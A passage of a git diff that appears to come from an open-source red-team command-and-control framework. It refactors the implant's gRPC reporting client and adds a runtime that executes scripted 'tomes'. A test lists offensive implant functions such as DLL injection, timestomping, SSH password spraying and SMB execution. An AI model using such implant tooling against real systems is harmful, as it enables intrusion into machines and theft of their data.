tonic::codec::ProstCodec::default(); + let path = tonic::codegen::http::uri::PathAndQuery::from_static(REPORT_FILE_PATH); + let mut req = request.into_streaming_request(); + req.extensions_mut() + .insert(GrpcMethod::new("c2.C2", "ReportFile")); + self.grpc.client_streaming(req, path, codec).await + } - /// - /// Report the active list of running processes. This list will replace any previously reported - /// lists for the same host. - pub async fn report_process_list( - &mut self, - request: impl tonic::IntoRequest, - ) -> std::result::Result, tonic::Status> - { - self.grpc.ready().await.map_err(|e| { - tonic::Status::new( - tonic::Code::Unknown, - format!("Service was not ready: {}", e), - ) - })?; - let codec: ProstCodec< - super::ReportProcessListRequest, - super::ReportProcessListResponse, - > = tonic::codec::ProstCodec::default(); - let path = - tonic::codegen::http::uri::PathAndQuery::from_static(REPORT_PROCESS_LIST_PATH); - let mut req = request.into_request(); - req.extensions_mut() - .insert(GrpcMethod::new("c2.C2", "ReportProcessList")); - self.grpc.unary(req, path, codec).await - } + /// + /// Report the active list of running processes. This list will replace any previously reported + /// lists for the same host. + pub async fn report_process_list( + &mut self, + request: impl tonic::IntoRequest, + ) -> std::result::Result, tonic::Status> { + self.grpc.ready().await.map_err(|e| { + tonic::Status::new( + tonic::Code::Unknown, + format!("Service was not ready: {}", e), + ) + })?; + let codec: ProstCodec = + tonic::codec::ProstCodec::default(); + let path = tonic::codegen::http::uri::PathAndQuery::from_static(REPORT_PROCESS_LIST_PATH); + let mut req = request.into_request(); + req.extensions_mut() + .insert(GrpcMethod::new("c2.C2", "ReportProcessList")); + self.grpc.unary(req, path, codec).await + } - /// - /// Report execution output for a task. 
- pub async fn report_task_output( - &mut self, - request: impl tonic::IntoRequest, - ) -> std::result::Result, tonic::Status> - { - self.grpc.ready().await.map_err(|e| { - tonic::Status::new( - tonic::Code::Unknown, - format!("Service was not ready: {}", e), - ) - })?; - let codec: ProstCodec = - tonic::codec::ProstCodec::default(); - let path = - tonic::codegen::http::uri::PathAndQuery::from_static(REPORT_TASK_OUTPUT_PATH); - let mut req = request.into_request(); - req.extensions_mut() - .insert(GrpcMethod::new("c2.C2", "ReportTaskOutput")); - self.grpc.unary(req, path, codec).await - } + /// + /// Report execution output for a task. + pub async fn report_task_output( + &mut self, + request: impl tonic::IntoRequest, + ) -> std::result::Result, tonic::Status> { + self.grpc.ready().await.map_err(|e| { + tonic::Status::new( + tonic::Code::Unknown, + format!("Service was not ready: {}", e), + ) + })?; + let codec: ProstCodec = + tonic::codec::ProstCodec::default(); + let path = tonic::codegen::http::uri::PathAndQuery::from_static(REPORT_TASK_OUTPUT_PATH); + let mut req = request.into_request(); + req.extensions_mut() + .insert(GrpcMethod::new("c2.C2", "ReportTaskOutput")); + self.grpc.unary(req, path, codec).await } } diff --git a/implants/lib/c2/src/lib.rs b/implants/lib/c2/src/lib.rs index 82ac2d0da..ceecb1e70 100644 --- a/implants/lib/c2/src/lib.rs +++ b/implants/lib/c2/src/lib.rs @@ -1,4 +1,6 @@ pub mod pb { include!("c2.rs"); - include!("c2_manual.rs"); } + +mod c2_manual; +pub use c2_manual::TavernClient; diff --git a/implants/lib/eldritch/Cargo.toml b/implants/lib/eldritch/Cargo.toml index 0ee665c83..c6a6845f5 100644 --- a/implants/lib/eldritch/Cargo.toml +++ b/implants/lib/eldritch/Cargo.toml @@ -1,6 +1,6 @@ [package] name = "eldritch" -version = "0.0.4" +version = "0.0.5" edition = "2021" [features] @@ -23,11 +23,14 @@ gazebo = { workspace = true } hex = { workspace = true } hex-literal = { workspace = true } ipnetwork = { workspace = true } +log = { workspace = true } md5 = { workspace = true } netstat2 = { workspace = true } nix = { workspace = true } object = { workspace = true } openssl = { workspace = true, features = ["vendored"] } +prost = { workspace = true} +prost-types = { workspace = true } regex = { workspace = true } reqwest = { workspace = true , features = ["blocking", "stream"] } russh = { workspace = true } @@ -46,6 +49,7 @@ tempfile = { workspace = true } tera = { workspace = true } tokio = { workspace = true , features = ["macros", "rt-multi-thread"] } tokio-stream = { workspace = true } +tonic = { workspace = true, features = ["tls-roots"] } windows-sys = { workspace = true, features = [ "Win32_Foundation", "Win32_System_LibraryLoader", @@ -58,7 +62,6 @@ windows-sys = { workspace = true, features = [ ]} whoami = { workspace = true } - [target.'cfg(windows)'.dependencies] network-interface = { workspace = true } winreg = { workspace = true } @@ -69,3 +72,8 @@ pnet = { workspace = true } [dev-dependencies] httptest = { workspace = true } uuid = { workspace = true, features = ["v4"] } + +[build-dependencies] +tonic-build = { workspace = true } +anyhow = { workspace = true } +which = { workspace = true } diff --git a/implants/lib/eldritch/build.rs b/implants/lib/eldritch/build.rs index bf2854ea2..72fa0f736 100644 --- a/implants/lib/eldritch/build.rs +++ b/implants/lib/eldritch/build.rs @@ -1,3 +1,8 @@ +use anyhow::Result; +use std::env; +use std::path::PathBuf; +use which::which; + #[cfg(target_os = "windows")] fn build_bin_create_file_dll() { use std::{ @@ -97,10 
+102,40 @@ fn set_host_family() { println!("cargo:rustc-cfg=host_family=\"{}\"", HOST_FAMILY); } -fn main() { +fn build_proto() -> Result<()> { + match env::var_os("PROTOC") + .map(PathBuf::from) + .or_else(|| which("protoc").ok()) + { + Some(_) => println!("Found protoc, protos will be generated"), + None => { + println!("WARNING: Failed to locate protoc, protos will not be generated"); + return Ok(()); + } + } + + match tonic_build::configure() + .out_dir("./src") + .protoc_arg("--rust_out=./src/pb.rs") + .build_client(false) + .build_server(false) + .compile(&["eldritch.proto"], &["../../../tavern/internal/c2/proto"]) + { + Err(err) => { + println!("WARNING: Failed to compile protos: {}", err); + } + Ok(_) => println!("Generating protos"), + } + Ok(()) +} + +fn main() -> Result<()> { set_host_family(); + build_proto()?; #[cfg(target_os = "windows")] build_bin_create_file_dll(); #[cfg(target_os = "windows")] build_bin_reflective_loader(); + + Ok(()) } diff --git a/implants/lib/eldritch/src/eldritch.rs b/implants/lib/eldritch/src/eldritch.rs new file mode 100644 index 000000000..21e6d3800 --- /dev/null +++ b/implants/lib/eldritch/src/eldritch.rs @@ -0,0 +1,138 @@ +/// Tome for eldritch to execute. +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct Tome { + #[prost(string, tag = "1")] + pub eldritch: ::prost::alloc::string::String, + #[prost(map = "string, string", tag = "2")] + pub parameters: ::std::collections::HashMap< + ::prost::alloc::string::String, + ::prost::alloc::string::String, + >, + #[prost(string, repeated, tag = "3")] + pub file_names: ::prost::alloc::vec::Vec<::prost::alloc::string::String>, +} +/// Process running on the host system. +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct Process { + #[prost(uint64, tag = "1")] + pub pid: u64, + #[prost(uint64, tag = "2")] + pub ppid: u64, + #[prost(string, tag = "3")] + pub name: ::prost::alloc::string::String, + #[prost(string, tag = "4")] + pub principal: ::prost::alloc::string::String, + #[prost(string, tag = "5")] + pub path: ::prost::alloc::string::String, + #[prost(string, tag = "6")] + pub cmd: ::prost::alloc::string::String, + #[prost(string, tag = "7")] + pub env: ::prost::alloc::string::String, + #[prost(string, tag = "8")] + pub cwd: ::prost::alloc::string::String, + #[prost(enumeration = "process::Status", tag = "9")] + pub status: i32, +} +/// Nested message and enum types in `Process`. +pub mod process { + #[derive( + Clone, + Copy, + Debug, + PartialEq, + Eq, + Hash, + PartialOrd, + Ord, + ::prost::Enumeration + )] + #[repr(i32)] + pub enum Status { + Unspecified = 0, + Unknown = 1, + Idle = 2, + Run = 3, + Sleep = 4, + Stop = 5, + Zombie = 6, + Tracing = 7, + Dead = 8, + WakeKill = 9, + Waking = 10, + Parked = 11, + LockBlocked = 12, + UninteruptibleDiskSleep = 13, + } + impl Status { + /// String value of the enum field names used in the ProtoBuf definition. + /// + /// The values are not transformed in any way and thus are considered stable + /// (if the ProtoBuf definition does not change) and safe for programmatic use. 
+ pub fn as_str_name(&self) -> &'static str { + match self { + Status::Unspecified => "STATUS_UNSPECIFIED", + Status::Unknown => "STATUS_UNKNOWN", + Status::Idle => "STATUS_IDLE", + Status::Run => "STATUS_RUN", + Status::Sleep => "STATUS_SLEEP", + Status::Stop => "STATUS_STOP", + Status::Zombie => "STATUS_ZOMBIE", + Status::Tracing => "STATUS_TRACING", + Status::Dead => "STATUS_DEAD", + Status::WakeKill => "STATUS_WAKE_KILL", + Status::Waking => "STATUS_WAKING", + Status::Parked => "STATUS_PARKED", + Status::LockBlocked => "STATUS_LOCK_BLOCKED", + Status::UninteruptibleDiskSleep => "STATUS_UNINTERUPTIBLE_DISK_SLEEP", + } + } + /// Creates an enum from field names used in the ProtoBuf definition. + pub fn from_str_name(value: &str) -> ::core::option::Option { + match value { + "STATUS_UNSPECIFIED" => Some(Self::Unspecified), + "STATUS_UNKNOWN" => Some(Self::Unknown), + "STATUS_IDLE" => Some(Self::Idle), + "STATUS_RUN" => Some(Self::Run), + "STATUS_SLEEP" => Some(Self::Sleep), + "STATUS_STOP" => Some(Self::Stop), + "STATUS_ZOMBIE" => Some(Self::Zombie), + "STATUS_TRACING" => Some(Self::Tracing), + "STATUS_DEAD" => Some(Self::Dead), + "STATUS_WAKE_KILL" => Some(Self::WakeKill), + "STATUS_WAKING" => Some(Self::Waking), + "STATUS_PARKED" => Some(Self::Parked), + "STATUS_LOCK_BLOCKED" => Some(Self::LockBlocked), + "STATUS_UNINTERUPTIBLE_DISK_SLEEP" => Some(Self::UninteruptibleDiskSleep), + _ => None, + } + } + } +} +/// ProcessList of running processes on the host system. +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct ProcessList { + #[prost(message, repeated, tag = "1")] + pub list: ::prost::alloc::vec::Vec, +} +/// File on the host system. +#[allow(clippy::derive_partial_eq_without_eq)] +#[derive(Clone, PartialEq, ::prost::Message)] +pub struct File { + #[prost(string, tag = "1")] + pub path: ::prost::alloc::string::String, + #[prost(string, tag = "2")] + pub owner: ::prost::alloc::string::String, + #[prost(string, tag = "3")] + pub group: ::prost::alloc::string::String, + #[prost(string, tag = "4")] + pub permissions: ::prost::alloc::string::String, + #[prost(int64, tag = "5")] + pub size: i64, + #[prost(string, tag = "6")] + pub sha3_256_hash: ::prost::alloc::string::String, + #[prost(bytes = "vec", tag = "7")] + pub chunk: ::prost::alloc::vec::Vec, +} diff --git a/implants/lib/eldritch/src/lib.rs b/implants/lib/eldritch/src/lib.rs index 4781ccaa8..84d2c1ed3 100644 --- a/implants/lib/eldritch/src/lib.rs +++ b/implants/lib/eldritch/src/lib.rs @@ -3,28 +3,18 @@ pub mod crypto; pub mod file; pub mod pivot; pub mod process; +pub mod runtime; pub mod sys; pub mod time; -use starlark::collections::SmallMap; +pub mod pb { + include!("eldritch.rs"); +} + +pub use runtime::{Output, Runtime}; + #[allow(unused_imports)] use starlark::const_frozen_string; -use starlark::environment::{Globals, GlobalsBuilder, LibraryExtension, Module}; -use starlark::eval::Evaluator; -use starlark::syntax::{AstModule, Dialect}; -use starlark::values::dict::Dict; -use starlark::values::{AllocValue, Value}; -use starlark::{starlark_module, PrintHandler}; -use std::collections::HashMap; -use std::sync::mpsc::Sender; - -use crate::crypto::CryptoLibrary; -use assets::AssetsLibrary; -use file::FileLibrary; -use pivot::PivotLibrary; -use process::ProcessLibrary; -use sys::SysLibrary; -use time::TimeLibrary; macro_rules! insert_dict_kv { ($dict:expr, $heap:expr, $key:expr, $val:expr, String) => { @@ -66,281 +56,3 @@ macro_rules! 
insert_dict_kv { }; } pub(crate) use insert_dict_kv; - -pub fn get_eldritch() -> anyhow::Result { - #[starlark_module] - fn eldritch(builder: &mut GlobalsBuilder) { - const file: FileLibrary = FileLibrary(); - const process: ProcessLibrary = ProcessLibrary(); - const sys: SysLibrary = SysLibrary(); - const pivot: PivotLibrary = PivotLibrary(); - const assets: AssetsLibrary = AssetsLibrary(); - const crypto: CryptoLibrary = CryptoLibrary(); - const time: TimeLibrary = TimeLibrary(); - } - - let globals = GlobalsBuilder::extended_by(&[ - LibraryExtension::StructType, - LibraryExtension::RecordType, - LibraryExtension::EnumType, - LibraryExtension::Map, - LibraryExtension::Filter, - LibraryExtension::Partial, - LibraryExtension::ExperimentalRegex, - LibraryExtension::Debug, - LibraryExtension::Print, - LibraryExtension::Breakpoint, - LibraryExtension::Json, - LibraryExtension::Abs, - LibraryExtension::Typing, - ]) - .with(eldritch) - .build(); - return Ok(globals); -} - -pub struct EldritchPrintHandler { - pub sender: Sender, -} - -impl PrintHandler for EldritchPrintHandler { - fn println(&self, text: &str) -> anyhow::Result<()> { - let res = match self.sender.send(text.to_string()) { - Ok(local_res) => local_res, - Err(local_err) => return Err(anyhow::anyhow!(local_err.to_string())), - }; - Ok(res) - } -} - -pub struct StdPrintHandler {} - -impl PrintHandler for StdPrintHandler { - fn println(&self, text: &str) -> anyhow::Result<()> { - print!("{}", text.to_owned()); - Ok(()) - } -} - -pub fn eldritch_run( - tome_filename: String, - tome_contents: String, - tome_parameters: Option>, - print_handler: &(dyn PrintHandler), -) -> anyhow::Result { - // Boilder plate - let ast = match AstModule::parse( - &tome_filename, - tome_contents.as_str().to_owned(), - &Dialect::Extended, - ) { - Ok(res) => res, - Err(err) => { - return Err(anyhow::anyhow!( - "[eldritch] Unable to parse eldritch tome: {}: {} {}", - err.to_string(), - tome_filename.as_str(), - tome_contents.as_str() - )) - } - }; - - // let tome_params_str: String = match tome_parameters { - // Some(local_param_string) => match local_param_string.as_str() { - // "" => "{}".to_string(), // If we get "" as our params update it to "{}" - // _ => local_param_string, // Otherwise return our string. 
- // }, - // None => "{}".to_string(), - // }; - - let globals = match get_eldritch() { - Ok(local_globals) => local_globals, - Err(local_error) => { - return Err(anyhow::anyhow!( - "[eldritch] Failed to get_eldritch globals: {}", - local_error.to_string() - )) - } - }; - - let module: Module = Module::new(); - - let res: SmallMap = SmallMap::new(); - let mut input_params: Dict = Dict::new(res); - - match tome_parameters { - Some(params) => { - for (key, value) in ¶ms { - let new_key = module.heap().alloc_str(&key); - let new_value = module.heap().alloc_str(value.as_str()).to_value(); - let hashed_key = match new_key.to_value().get_hashed() { - Ok(local_hashed_key) => local_hashed_key, - Err(local_error) => { - return Err(anyhow::anyhow!( - "[eldritch] Failed to create hashed key for key {}: {}", - new_key.to_string(), - local_error.to_string() - )) - } - }; - input_params.insert_hashed(hashed_key, new_value); - } - } - None => {} - } - module.set("input_params", input_params.alloc_value(module.heap())); - - let mut eval: Evaluator = Evaluator::new(&module); - eval.set_print_handler(print_handler); - - let res: Value = match eval.eval_module(ast, &globals) { - Ok(eval_val) => eval_val, - Err(eval_error) => { - return Err(anyhow::anyhow!( - "[eldritch] Eldritch eval_module failed:\n{}", - eval_error - )) - } - }; - - Ok(res.to_str()) -} - -#[cfg(test)] -mod tests { - use std::{sync::mpsc::channel, thread, time::Duration}; - - use super::*; - use starlark::assert::Assert; - use tempfile::NamedTempFile; - - // just checks dir... - #[test] - fn test_library_bindings() { - let globals = get_eldritch().unwrap(); - let mut a = Assert::new(); - a.globals(globals); - a.all_true( - r#" -dir(file) == ["append", "compress", "copy", "download", "exists", "find", "is_dir", "is_file", "list", "mkdir", "moveto", "read", "remove", "replace", "replace_all", "template", "timestomp", "write"] -dir(process) == ["info", "kill", "list", "name", "netstat"] -dir(sys) == ["dll_inject", "dll_reflect", "exec", "get_env", "get_ip", "get_os", "get_pid", "get_reg", "get_user", "hostname", "is_linux", "is_macos", "is_windows", "shell", "write_reg_hex", "write_reg_int", "write_reg_str"] -dir(pivot) == ["arp_scan", "bind_proxy", "ncat", "port_forward", "port_scan", "smb_exec", "ssh_copy", "ssh_exec", "ssh_password_spray"] -dir(assets) == ["copy","list","read","read_binary"] -dir(crypto) == ["aes_decrypt_file", "aes_encrypt_file", "decode_b64", "encode_b64", "from_json", "hash_file", "to_json"] -dir(time) == ["format_to_epoch", "format_to_readable", "now", "sleep"] -"#, - ); - } - - #[test] - fn test_library_parameter_input_string() -> anyhow::Result<()> { - // Create test script - let test_content = format!( - r#" -sys.shell(input_params['cmd2']) -"# - ); - let params = HashMap::from([ - ("cmd".to_string(), "id".to_string()), - ("cmd2".to_string(), "echo hello_world".to_string()), - ("cmd3".to_string(), "ls -lah /tmp/".to_string()), - ]); - let test_res = eldritch_run( - "test.tome".to_string(), - test_content, - Some(params), - &StdPrintHandler {}, - ); - assert!(test_res?.contains("hello_world")); - Ok(()) - } - - #[test] - fn test_library_parameter_input_number() -> anyhow::Result<()> { - // Create test script - let test_content = format!( - r#" -input_params["number"] -"# - ); - let params = HashMap::from([("number".to_string(), "1".to_string())]); - let test_res = eldritch_run( - "test.tome".to_string(), - test_content, - Some(params), - &StdPrintHandler {}, - ); - assert_eq!(test_res.unwrap(), "1".to_string()); - 
Ok(()) - } - - #[tokio::test] - async fn test_library_async() -> anyhow::Result<()> { - // just using a temp file for its path - let tmp_file = NamedTempFile::new()?; - let path = String::from(tmp_file.path().to_str().unwrap()) - .clone() - .replace("\\", "\\\\"); - let test_content = format!( - r#" -file.download("https://www.google.com/", "{path}") -"# - ); - let test_res = thread::spawn(|| { - eldritch_run( - "test.tome".to_string(), - test_content, - None, - &StdPrintHandler {}, - ) - }); - let _test_val = test_res.join(); - - assert!(tmp_file.as_file().metadata().unwrap().len() > 5); - - Ok(()) - } - #[tokio::test] - async fn test_library_custom_print_handler() -> anyhow::Result<()> { - // just using a temp file for its path - let test_content = format!( - r#" -print("Hello") -print("World") -print("123") -"# - ); - let (sender, receiver) = channel::(); - - let test_res = thread::spawn(|| { - eldritch_run( - "test.tome".to_string(), - test_content, - None, - &EldritchPrintHandler { sender }, - ) - }); - let _test_val = test_res.join(); - let expected_output = vec!["Hello", "World", "123"]; - let mut index = 0; - loop { - let res = match receiver.recv_timeout(Duration::from_millis(500)) { - Ok(local_res_string) => local_res_string, - Err(local_err) => { - match local_err.to_string().as_str() { - "channel is empty and sending half is closed" => { - break; - } - _ => eprint!("Error: {}", local_err), - } - break; - } - }; - assert_eq!(res, expected_output[index].to_string()); - index = index + 1; - } - - Ok(()) - } -} diff --git a/implants/lib/eldritch/src/pivot/arp_scan_impl.rs b/implants/lib/eldritch/src/pivot/arp_scan_impl.rs index 56d4ef432..ae9763e89 100644 --- a/implants/lib/eldritch/src/pivot/arp_scan_impl.rs +++ b/implants/lib/eldritch/src/pivot/arp_scan_impl.rs @@ -215,7 +215,7 @@ pub fn handle_arp_scan( Ok(_) => {} Err(_err) => { #[cfg(debug_assertions)] - eprintln!("Listener on {} failed: {}", inner_interface.name, _err); + log::error!("Listener on {} failed: {}", inner_interface.name, _err); } }, ); diff --git a/implants/lib/eldritch/src/runtime.rs b/implants/lib/eldritch/src/runtime.rs new file mode 100644 index 000000000..a418952d8 --- /dev/null +++ b/implants/lib/eldritch/src/runtime.rs @@ -0,0 +1,550 @@ +use crate::pb::{File, ProcessList}; +use crate::{ + assets::AssetsLibrary, crypto::CryptoLibrary, file::FileLibrary, pb::Tome, pivot::PivotLibrary, + process::ProcessLibrary, sys::SysLibrary, time::TimeLibrary, +}; +use anyhow::{Context, Error, Result}; +use chrono::Utc; +use prost_types::Timestamp; +use starlark::{ + collections::SmallMap, + environment::{Globals, GlobalsBuilder, LibraryExtension, Module}, + eval::Evaluator, + starlark_module, + syntax::{AstModule, Dialect}, + values::{dict::Dict, AnyLifetime}, + values::{AllocValue, ProvidesStaticType}, + PrintHandler, +}; +use std::sync::mpsc::{channel, Receiver, Sender}; +use std::time::Duration; + +/* + * Eldritch Runtime + * + * This runtime is responsible for executing Tomes and reporting their output. + * It acts as an interface between callers and starlark, exposing our standard libraries to the starlark interpreter. + * It is also used to provide dependency injection for eldritch library functions (using `Runtime::from_extra(starlark_interpreter.extra)`). 
+ */
+#[derive(ProvidesStaticType)]
+pub struct Runtime {
+    stdout_reporting: bool,
+
+    ch_exec_started_at: Sender<Timestamp>,
+    ch_exec_finished_at: Sender<Timestamp>,
+    ch_output: Sender<String>,
+    ch_error: Sender<Error>,
+    ch_process_list: Sender<ProcessList>,
+    ch_file: Sender<File>,
+}
+
+impl Runtime {
+    /*
+     * Prepare a new Runtime for execution of a single tome.
+     */
+    pub fn new() -> (Runtime, Output) {
+        let (ch_exec_started_at, exec_started_at) = channel::<Timestamp>();
+        let (ch_exec_finished_at, exec_finished_at) = channel::<Timestamp>();
+        let (ch_error, errors) = channel::<Error>();
+        let (ch_output, outputs) = channel::<String>();
+        let (ch_process_list, process_lists) = channel::<ProcessList>();
+        let (ch_file, files) = channel::<File>();
+
+        return (
+            Runtime {
+                stdout_reporting: false,
+                ch_exec_started_at,
+                ch_exec_finished_at,
+                ch_output,
+                ch_error,
+                ch_process_list,
+                ch_file,
+            },
+            Output {
+                exec_started_at,
+                exec_finished_at,
+                outputs,
+                errors,
+                process_lists,
+                files,
+            },
+        );
+    }
+
+    /*
+     * Extract an existing runtime from the starlark evaluator extra field.
+     */
+    pub fn from_extra<'a>(extra: Option<&'a dyn AnyLifetime<'a>>) -> Result<&'a Runtime> {
+        extra
+            .context("no extra field present in evaluator")?
+            .downcast_ref::<Runtime>()
+            .context("no runtime present in evaluator")
+    }
+
+    /*
+     * Run an Eldritch tome, returning an error if it fails.
+     * Output from the tome is exposed via channels, see `reported_output`, `reported_process_list`, and `reported_files`.
+     */
+    pub fn run(&self, tome: Tome) {
+        match self.report_exec_started_at() {
+            Ok(_) => {}
+            Err(_err) => {
+                #[cfg(debug_assertions)]
+                log::error!("failed to send exec_started_at: {_err}");
+            }
+        }
+
+        match self.run_impl(tome) {
+            Ok(_) => {}
+            Err(err) => match self.report_error(err) {
+                Ok(_) => {}
+                Err(_send_err) => {
+                    #[cfg(debug_assertions)]
+                    log::error!("failed to send error: {_send_err}");
+                }
+            },
+        }
+
+        match self.report_exec_finished_at() {
+            Ok(_) => {}
+            Err(_err) => {
+                #[cfg(debug_assertions)]
+                log::error!("failed to send exec_finished_at: {_err}");
+            }
+        }
+    }
+
+    fn run_impl(&self, tome: Tome) -> Result<()> {
+        let ast = Runtime::parse(&tome)?;
+        let module = Runtime::alloc_module(&tome)?;
+        let globals = Runtime::globals();
+
+        let mut eval: Evaluator = Evaluator::new(&module);
+        eval.extra = Some(self);
+        eval.set_print_handler(self);
+
+        match eval.eval_module(ast, &globals) {
+            Ok(_) => Ok(()),
+            Err(_err) => {
+                #[cfg(debug_assertions)]
+                log::error!("tome execution failed: {_err}");
+                Err(_err)
+            }
+        }
+    }
+
+    /*
+     * Globals available to eldritch code.
+     * This provides all of our starlark standard libraries.
+     */
+    pub fn globals() -> Globals {
+        #[starlark_module]
+        fn eldritch(builder: &mut GlobalsBuilder) {
+            const file: FileLibrary = FileLibrary();
+            const process: ProcessLibrary = ProcessLibrary();
+            const sys: SysLibrary = SysLibrary();
+            const pivot: PivotLibrary = PivotLibrary();
+            const assets: AssetsLibrary = AssetsLibrary();
+            const crypto: CryptoLibrary = CryptoLibrary();
+            const time: TimeLibrary = TimeLibrary();
+        }
+
+        GlobalsBuilder::extended_by(&[
+            LibraryExtension::StructType,
+            LibraryExtension::RecordType,
+            LibraryExtension::EnumType,
+            LibraryExtension::Map,
+            LibraryExtension::Filter,
+            LibraryExtension::Partial,
+            LibraryExtension::ExperimentalRegex,
+            LibraryExtension::Debug,
+            LibraryExtension::Print,
+            LibraryExtension::Breakpoint,
+            LibraryExtension::Json,
+            LibraryExtension::Abs,
+            LibraryExtension::Typing,
+        ])
+        .with(eldritch)
+        .build()
+    }
+
+    /*
+     * Parse an Eldritch tome into a starlark Abstract Syntax Tree (AST) Module.
+     */
+    fn parse(tome: &Tome) -> Result<AstModule> {
+        match AstModule::parse("main", tome.eldritch.to_string(), &Dialect::Extended) {
+            Ok(res) => Ok(res),
+            Err(err) => {
+                return Err(anyhow::anyhow!(
+                    "[eldritch] Unable to parse eldritch tome: {}: {}",
+                    err.to_string(),
+                    tome.eldritch.to_string(),
+                ))
+            }
+        }
+    }
+
+    /*
+     * Allocate tome parameters on a new starlark module and return it, ready for execution.
+     */
+    fn alloc_module(tome: &Tome) -> Result<Module> {
+        let module: Module = Module::new();
+        let mut input_params: Dict = Dict::new(SmallMap::new());
+
+        for (key, value) in &tome.parameters {
+            let new_key = module.heap().alloc_str(&key);
+            let new_value = module.heap().alloc_str(value.as_str()).to_value();
+            let hashed_key = match new_key.to_value().get_hashed() {
+                Ok(local_hashed_key) => local_hashed_key,
+                Err(local_error) => {
+                    return Err(anyhow::anyhow!(
+                        "[eldritch] Failed to create hashed key for key {}: {}",
+                        new_key.to_string(),
+                        local_error.to_string()
+                    ))
+                }
+            };
+            input_params.insert_hashed(hashed_key, new_value);
+        }
+        module.set("input_params", input_params.alloc_value(module.heap()));
+
+        Ok(module)
+    }
+
+    /*
+     * Print execution results to stdout as they become available.
+     */
+    pub fn with_stdout_reporting(&mut self) -> &mut Self {
+        self.stdout_reporting = true;
+        self
+    }
+
+    /*
+     * Send exec_started_at timestamp.
+     */
+    fn report_exec_started_at(&self) -> Result<()> {
+        let now = Utc::now();
+        self.ch_exec_started_at.send(Timestamp {
+            seconds: now.timestamp(),
+            nanos: now.timestamp_subsec_nanos() as i32,
+        })?;
+        Ok(())
+    }
+
+    /*
+     * Send exec_finished_at timestamp.
+     */
+    fn report_exec_finished_at(&self) -> Result<()> {
+        let now = Utc::now();
+        self.ch_exec_finished_at.send(Timestamp {
+            seconds: now.timestamp(),
+            nanos: now.timestamp_subsec_nanos() as i32,
+        })?;
+        Ok(())
+    }
+
+    /*
+     * Report output of the tome execution.
+     */
+    pub fn report_output(&self, output: String) -> Result<()> {
+        self.ch_output.send(output)?;
+        Ok(())
+    }
+
+    /*
+     * Report error of the tome execution.
+     */
+    pub fn report_error(&self, err: anyhow::Error) -> Result<()> {
+        self.ch_error.send(err)?;
+        Ok(())
+    }
+
+    /*
+     * Report a process list that was collected by the tome.
+     */
+    pub fn report_process_list(&self, processes: ProcessList) -> Result<()> {
+        self.ch_process_list.send(processes)?;
+        Ok(())
+    }
+
+    /*
+     * Report a file that was collected by the tome.
+     */
+    pub fn report_file(&self, f: File) -> Result<()> {
+        self.ch_file.send(f)?;
+        Ok(())
+    }
+}
+
+/*
+ * Enables Runtime to be used as a starlark print handler.
+ */
+impl PrintHandler for Runtime {
+    fn println(&self, text: &str) -> anyhow::Result<()> {
+        self.report_output(text.to_string())?;
+        if self.stdout_reporting {
+            print!("{}", text);
+        }
+        Ok(())
+    }
+}
+
+/*
+ * Output enables callers to listen for various types of output from the runtime.
+ * Each of the `collect` methods will return lists of all currently available data.
+ */
+pub struct Output {
+    exec_started_at: Receiver<Timestamp>,
+    exec_finished_at: Receiver<Timestamp>,
+    outputs: Receiver<String>,
+    errors: Receiver<Error>,
+    process_lists: Receiver<ProcessList>,
+    files: Receiver<File>,
+}
+
+impl Output {
+    /*
+     * Returns the timestamp of when execution started, if available.
+     */
+    pub fn get_exec_started_at(&self) -> Option<Timestamp> {
+        drain_last(&self.exec_started_at)
+    }
+
+    /*
+     * Returns the timestamp of when execution finished, if available.
+     */
+    pub fn get_exec_finished_at(&self) -> Option<Timestamp> {
+        drain_last(&self.exec_finished_at)
+    }
+
+    /*
+     * Collects all currently available reported text output.
+     */
+    pub fn collect(&self) -> Vec<String> {
+        drain(&self.outputs)
+    }
+
+    /*
+     * Collects all currently available reported errors, if any.
+     */
+    pub fn collect_errors(&self) -> Vec<Error> {
+        drain(&self.errors)
+    }
+
+    /*
+     * Returns all currently available reported process lists, if any.
+     */
+    pub fn collect_process_lists(&self) -> Vec<ProcessList> {
+        drain(&self.process_lists)
+    }
+
+    /*
+     * Returns all currently available reported files, if any.
+     */
+    pub fn collect_files(&self) -> Vec<File> {
+        drain(&self.files)
+    }
+}
+
+/*
+ * Drain a receiver, returning only the last currently available result.
+ */
+fn drain_last<T>(receiver: &Receiver<T>) -> Option<T> {
+    drain(receiver).pop()
+}
+
+/*
+ * Drain a receiver, returning all currently available results as a Vec.
+ */
+fn drain<T>(reciever: &Receiver<T>) -> Vec<T> {
+    let mut result: Vec<T> = Vec::new();
+    loop {
+        let val = match reciever.recv_timeout(Duration::from_millis(100)) {
+            Ok(v) => v,
+            Err(err) => {
+                match err.to_string().as_str() {
+                    "channel is empty and sending half is closed" => {
+                        break;
+                    }
+                    "timed out waiting on channel" => {
+                        break;
+                    }
+                    _ => {
+                        #[cfg(debug_assertions)]
+                        eprint!("failed to drain channel: {}", err)
+                    }
+                }
+                break;
+            }
+        };
+        // let appended_line = format!("{}{}", res.to_owned(), new_res_line);
+        result.push(val);
+    }
+    result
+}
+
+#[cfg(test)]
+mod tests {
+    use crate::{pb::Tome, Runtime};
+    use anyhow::Error;
+    use std::collections::HashMap;
+    use tempfile::NamedTempFile;
+
+    macro_rules! runtime_tests {
+        ($($name:ident: $value:expr,)*) => {
+            $(
+                #[test]
+                fn $name() {
+                    let tc: TestCase = $value;
+                    let (runtime, output) = Runtime::new();
+                    runtime.run(tc.tome);
+
+                    let want_err_str = match tc.want_error {
+                        Some(err) => err.to_string(),
+                        None => "".to_string(),
+                    };
+                    let err_str = match output.collect_errors().pop() {
+                        Some(err) => err.to_string(),
+                        None => "".to_string(),
+                    };
+                    assert_eq!(want_err_str, err_str);
+                    assert_eq!(tc.want_output, output.collect().join(""));
+                }
+            )*
+        }
+    }
+
+    struct TestCase {
+        pub tome: Tome,
+        pub want_output: String,
+        pub want_error: Option<Error>,
+    }
+
+    runtime_tests!
